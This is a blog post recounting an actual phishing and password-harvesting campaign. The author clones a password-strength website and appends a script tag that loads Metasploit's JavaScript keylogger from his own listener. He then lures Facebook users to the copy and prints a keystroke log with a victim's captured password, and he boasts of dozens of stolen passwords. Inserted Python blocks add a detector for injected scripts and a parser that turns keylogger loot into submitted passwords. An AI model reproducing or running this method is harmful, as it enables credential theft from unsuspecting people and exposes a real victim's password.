Although I had discovered the http_javascript_keylogger module quite a long time ago, it's only recently that I found a rather effective way of using it: harvesting passwords.
Synopsis
-First, I used httrack to mirror the entire website http://howsecureismypassword.net/ onto my computer.
root@z3ro:~# httrack http://howsecureismypassword.net/
Mirror launched on Mon, 12 Aug 2012 17:10:19 by HTTrack Website Copier/3.43-9+libhtsjava.so.2 [XR&CO'2010]
mirroring http://howsecureismypassword.net/ with the wizard help..
Done.: howsecureismypassword.net/assets/fonts/League_Gothic-webfont.svg (27651 bytes) - OK
Thanks for using HTTrack!
-Next, I injected the JavaScript keylogger into the web page I had just copied (the inner quotes are escaped so the shell passes them through to the file instead of stripping them):
root@z3ro:~# echo "<script type=\"text/javascript\" src=\"http://$IP:8081/log/NNRtKZNlErTh.js\"></script>" >> /var/www/howsecureismypassword.net/index.html
-I then hosted the website on my computer using lighttpd and started the Metasploit listener (auxiliary/server/capture/http_javascript_keylogger) on port 8081. With lighttpd running on port 80 and Metasploit on port 8081, I forwarded the respective ports to make my website reachable from the internet.
-Everything was set on my side; I now only needed a 'victim', and Facebook proved to offer many.
-Convincing someone to 'check out' the website proved to be easier than expected.
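The tell-tale of the injection step is a script tag that loads from a host other than the page's own and, because of the `>>`, one that sits after the closing </html>. The Python below is an added example (not code from the original post and not a Metasploit component) that audits a saved page for exactly that: every script src is resolved against the page's URL and flagged when its origin differs and its host is not on an allowlist. The sample page, the jQuery CDN line and the 203.0.113.10 address (standing in for $IP) are constructed; the script name is the one from the echo command above. This is a check on the cloned page as served, which is the only place the injection is visible, since the real site is never touched.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptCollector(HTMLParser):
    """Record every <script src> together with whether it appears after </html>,
    which is where 'echo ... >> index.html' lands the injected tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []          # (src, appeared_after_html_close)
        self._html_closed = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append((src, self._html_closed))

    def handle_endtag(self, tag):
        if tag == "html":
            self._html_closed = True


def foreign_scripts(html, page_url, allowlist=()):
    """Return [(absolute_src, reason)] for script tags that load from an origin
    other than page_url's and whose host is not in allowlist (e.g. a known CDN).
    Scheme-relative and path-relative src values are resolved against page_url."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    page = urlsplit(page_url)
    page_origin = (page.scheme.lower(), page.netloc.lower())
    findings = []
    for src, trailing in collector.scripts:
        absolute = urljoin(page_url, src)
        parts = urlsplit(absolute)
        if (parts.scheme.lower(), parts.netloc.lower()) == page_origin:
            continue
        if parts.hostname in allowlist:
            continue
        reason = "cross-origin script"
        if trailing:
            reason += ", appended after </html>"
        findings.append((absolute, reason))
    return findings


# Constructed sample: a cut-down stand-in for the mirrored index.html after the
# echo above. 203.0.113.10 is a documentation address standing in for $IP; the
# jQuery CDN line is invented to show the allowlist, not copied from the site.
CLONED_PAGE = """<!DOCTYPE html>
<html><head><title>How Secure Is My Password?</title>
<script src="/assets/js/application.js"></script>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
</head><body><input type="password" id="password"></body></html>
<script type="text/javascript" src="http://203.0.113.10:8081/log/NNRtKZNlErTh.js"></script>
"""

if __name__ == "__main__":
    for src, why in foreign_scripts(CLONED_PAGE, "http://howsecureismypassword.net/",
                                    allowlist=("ajax.googleapis.com",)):
        print(f"{why}: {src}")
```

Run against the constructed page, the allowlisted CDN and the same-origin asset pass, and the only finding is the listener URL, reported as a cross-origin script appended after </html>.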
Here's a preview from my last target:
Starting Metasploit
[*] Please wait while we load the module tree...
=[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 916 exploits - 495 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops
demo => true
srvhost => 192.168.1.2
srvport => 8081
uripath => log
[*] Listening on 192.168.1.2:8081...
[*] Using URL: http://192.168.1.2:8081/log
[*] Server started.
[*] 197.225.238.119 http_javascript_keylogger - Assigning client identifier '0779c624'
[+] [0779c624] Logging clean keystrokes to: /root/.msf4/loot/20120805194327_default_197.225.238.119_browser.keystrok_771244.txt
[+] [0779c624] Logging raw keystrokes to: /root/.msf4/loot/20120805194330_default_197.225.238.119_browser.keystrok_134192.txt
[+] [0779c624] Keys: m
[+] [0779c624] Keys: me
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifier
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: me
[+] [0779c624] Keys: m
[+] [0779c624] Keys: p
[+] [0779c624] Keys: pa
[+] [0779c624] Keys: pas
[+] [0779c624] Keys: pass
[+] [0779c624] Keys: passw
[+] [0779c624] Keys: passwo
[+] [0779c624] Keys: passwor
[+] [0779c624] Keys: password
[+] [0779c624] Keys: passwor
[+] [0779c624] Keys: passwo
[+] [0779c624] Keys: passw
[+] [0779c624] Keys: pass
[+] [0779c624] Keys: pas
[+] [0779c624] Keys: pa
[+] [0779c624] Keys: p
[+] [0779c624] Keys: m
[+] [0779c624] Keys: me
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifier
[+] [0779c624] Keys: meinteraamplifier<CR>
[+] [0779c624] Keys: j
[+] [0779c624] Keys: jr
[+] [0779c624] Keys: jra
[+] [0779c624] Keys: jras
[+] [0779c624] Keys: jrast
[+] [0779c624] Keys: jrasta
[+] [0779c624] Keys: jrastam
[+] [0779c624] Keys: jrastame
[+] [0779c624] Keys: jrastamec
[+] [0779c624] Keys: jrastameck
[+] [0779c624] Keys: jrastamecka
[+] [0779c624] Keys: jrastameckay
[+] [0779c624] Keys: jrastameckays
[+] [0779c624] Keys: jrastameckaysha
[+] [0779c624] Keys: jrastameckaysh
[+] [0779c624] Keys: jrastameckayshal
[+] [0779c624] Keys: jrastameckaysha
[+] [0779c624] Keys: jrastameckaysh
[+] [0779c624] Keys: jrastameckays
[+] [0779c624] Keys: jrastameckay
[+] [0779c624] Keys: jrastamecka
[+] [0779c624] Keys: jrastameck
[+] [0779c624] Keys: jrastamec
[+] [0779c624] Keys: jrastame
[+] [0779c624] Keys: jrastam
[+] [0779c624] Keys: jrasta
[+] [0779c624] Keys: jrast
[+] [0779c624] Keys: jras
[+] [0779c624] Keys: jra
[+] [0779c624] Keys: jr
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j0
[+] [0779c624] Keys: j0k
[+] [0779c624] Keys: j0ks
[+] [0779c624] Keys: j0ksh
[+] [0779c624] Keys: j0ksh4
[+] [0779c624] Keys: j0ksh4s
[+] [0779c624] Keys: j0ksh4sh
[+] [0779c624] Keys: j0ksh4sh4
[+] [0779c624] Keys: j0ksh4sh4l4
[+] [0779c624] Keys: j0ksh4sh4l
[+] [0779c624] Keys: j0ksh4sh4l4e
[+] [0779c624] Keys: j0ksh4sh4l4ev
[+] [0779c624] Keys: j0ksh4sh4l4ev4
[+] [0779c624] Keys: j0ksh4sh4l4ev
[+] [0779c624] Keys: j0ksh4sh4l4e
[+] [0779c624] Keys: j0ksh4sh4l4
[+] [0779c624] Keys: j0ksh4sh4l
[+] [0779c624] Keys: j0ksh4sh4
[+] [0779c624] Keys: j0ksh4sh
[+] [0779c624] Keys: j0ksh4s
[+] [0779c624] Keys: j0ksh4
[+] [0779c624] Keys: j0ksh
[+] [0779c624] Keys: j0ks
[+] [0779c624] Keys: j0k
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j0
[+] [0779c624] Keys: w
[+] [0779c624] Keys: wi
[+] [0779c624] Keys: wis
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish u
[+] [0779c624] Keys: wish up
[+] [0779c624] Keys: wish up0
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a s
[+] [0779c624] Keys: wish up0n a st
[+] [0779c624] Keys: wish up0n a sta
[+] [0779c624] Keys: wish up0n a star
[+] [0779c624] Keys: wish up0n a sta
[+] [0779c624] Keys: wish up0n a st
[+] [0779c624] Keys: wish up0n a s
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0
[+] [0779c624] Keys: wish up
[+] [0779c624] Keys: wish u
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wis
[+] [0779c624] Keys: wi
[+] [0779c624] Keys: w
[+] [0779c624] Keys: a
[+] [0779c624] Keys: am
[+] [0779c624] Keys: amh
[+] [0779c624] Keys: amhg
[+] [0779c624] Keys: amhgw
[+] [0779c624] Keys: amhgws
[+] [0779c624] Keys: amhgwsd
[+] [0779c624] Keys: amhgwsdk
[+] [0779c624] Keys: amhgwsdkj
[+] [0779c624] Keys: amhgwsdkj.
[+] [0779c624] Keys: amhgwsdkj.c
[+] [0779c624] Keys: amhgwsdkj.ce
[+] [0779c624] Keys: amhgwsdkj.ced
[+] [0779c624] Keys: amhgwsdkj.cedv
[+] [0779c624] Keys: amhgwsdkj.cedvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/r
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rl
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlb
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbv
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'i
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ie
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ieo
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ie
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'i
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbv
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rl
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlb
[+] [0779c624] Keys: amhgwsdkj.cedvhe/r
[+] [0779c624] Keys: amhgwsdkj.cedvhe/
[+] [0779c624] Keys: amhgwsdkj.cedv
[+] [0779c624] Keys: amhgwsdkj.cedvhe
[+] [0779c624] Keys: amhgwsdkj.ced
[+] [0779c624] Keys: amhgwsdkj.cedvh
[+] [0779c624] Keys: amhgwsdkj.c
[+] [0779c624] Keys: amhgwsdkj.ce
[+] [0779c624] Keys: amhgwsdkj.
[+] [0779c624] Keys: amhgwsdkj
[+] [0779c624] Keys: amhgwsdk
[+] [0779c624] Keys: amhgwsd
[+] [0779c624] Keys: amhgws
[+] [0779c624] Keys: amhgw
[+] [0779c624] Keys: amhg
[+] [0779c624] Keys: amh
[+] [0779c624] Keys: am
[+] [0779c624] Keys: a
[+] [0779c624] Keys: ab
[+] [0779c624] Keys: a
[+] [0779c624] Keys: abc
[+] [0779c624] Keys: abcd
[+] [0779c624] Keys: abcde
[+] [0779c624] Keys: abcdef
[+] [0779c624] Keys: abcdefg
[+] [0779c624] Keys: abcdefgh
[+] [0779c624] Keys: abcdefghi
[+] [0779c624] Keys: abcdefghij
[+] [0779c624] Keys: abcdefghijk
[+] [0779c624] Keys: abcdefghijkl
[+] [0779c624] Keys: abcdefghijklm
[+] [0779c624] Keys: abcdefghijklmn
[+] [0779c624] Keys: abcdefghijklmno
[+] [0779c624] Keys: abcdefghijklmnop
[+] [0779c624] Keys: abcdefghijklmnopq
[+] [0779c624] Keys: abcdefghijklmnopqr
[+] [0779c624] Keys: abcdefghijklmnopqrs
[+] [0779c624] Keys: abcdefghijklmnopqrst
[+] [0779c624] Keys: abcdefghijklmnopqrstu
[+] [0779c624] Keys: abcdefghijklmnopqrstuv
[+] [0779c624] Keys: abcdefghijklmnopqrstuvw
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwx
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwxy
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwxyz
That's it. His password was actually meinteraamplifier, and although the guy seemed to have enjoyed typing whatever he felt like typing, I did get his password!
I have over 42 passwords now and I've worked out a success rate of about 87%.
The human weakness factor is so much easier to penetrate than the network or server weaknesses. The attack is plain and simple, with no known problems with AVs.
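Reading a capture like the one above line by line is tedious: the module prints the whole field contents after every key event, sometimes out of order (the 'meinteraamp' lines), and most of the lines are partial states. The Python below is an added example, not part of the original post or of the Metasploit module, that collapses such a log into the strings actually submitted (those ending in <CR>) and the longest form of every string that was typed and then deleted, per client id. The sample log is a trimmed, constructed copy of the capture above, assuming, as the log shows, that each 'Keys:' line is the full field contents and '<CR>' marks Enter.

```python
import re

# Matches the per-client keystroke lines msfconsole prints for the module.
KEYS_RE = re.compile(r"^\[\+\] \[(?P<client>[0-9a-f]+)\] Keys: (?P<buf>.*)$")

# Constructed sample: a trimmed copy of the capture shown above, including the
# out-of-order lines and the <CR> that marks the Enter key.
SAMPLE_LOG = """\
[*] 197.225.238.119 http_javascript_keylogger - Assigning client identifier '0779c624'
[+] [0779c624] Keys: m
[+] [0779c624] Keys: me
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: meinteraamplifier
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: m
[+] [0779c624] Keys: p
[+] [0779c624] Keys: pass
[+] [0779c624] Keys: password
[+] [0779c624] Keys: p
[+] [0779c624] Keys: meinteraamplifier
[+] [0779c624] Keys: meinteraamplifier<CR>
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j0ksh4sh4l4ev4
[+] [0779c624] Keys: j0
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwxyz
"""


def parse_keys(text):
    """Return (client_id, field_contents) for every 'Keys:' line, in log order.
    Other msfconsole output (status lines, loot paths) is ignored."""
    events = []
    for line in text.splitlines():
        m = KEYS_RE.match(line)
        if m:
            events.append((m.group("client"), m.group("buf")))
    return events


def collapse(events):
    """Per client, return the strings submitted with Enter and the 'typed' strings:
    every observed field content that is not a proper prefix of another one.
    Partial states (me, mei, ...), repeats and out-of-order deliveries all fall
    away, so each attempt survives once, at its longest form."""
    seen = {}
    for client, buf in events:
        state = seen.setdefault(client, {"submitted": [], "buffers": []})
        if buf.endswith("<CR>"):
            buf = buf[: -len("<CR>")]
            state["submitted"].append(buf)
        if buf and buf not in state["buffers"]:
            state["buffers"].append(buf)
    result = {}
    for client, state in seen.items():
        bufs = state["buffers"]
        maximal = [b for b in bufs if not any(o != b and o.startswith(b) for o in bufs)]
        result[client] = {"submitted": state["submitted"], "typed": maximal}
    return result


if __name__ == "__main__":
    for client, r in collapse(parse_keys(SAMPLE_LOG)).items():
        print(client, "submitted:", r["submitted"])
        print(client, "typed:    ", r["typed"])
```

On the sample this yields one submitted string, meinteraamplifier, and four typed attempts (meinteraamplifier, password, j0ksh4sh4l4ev4 and the alphabet), which is the same conclusion as reading the full capture by eye. Feeding it the loot file the module writes works the same way, since the lines share the format.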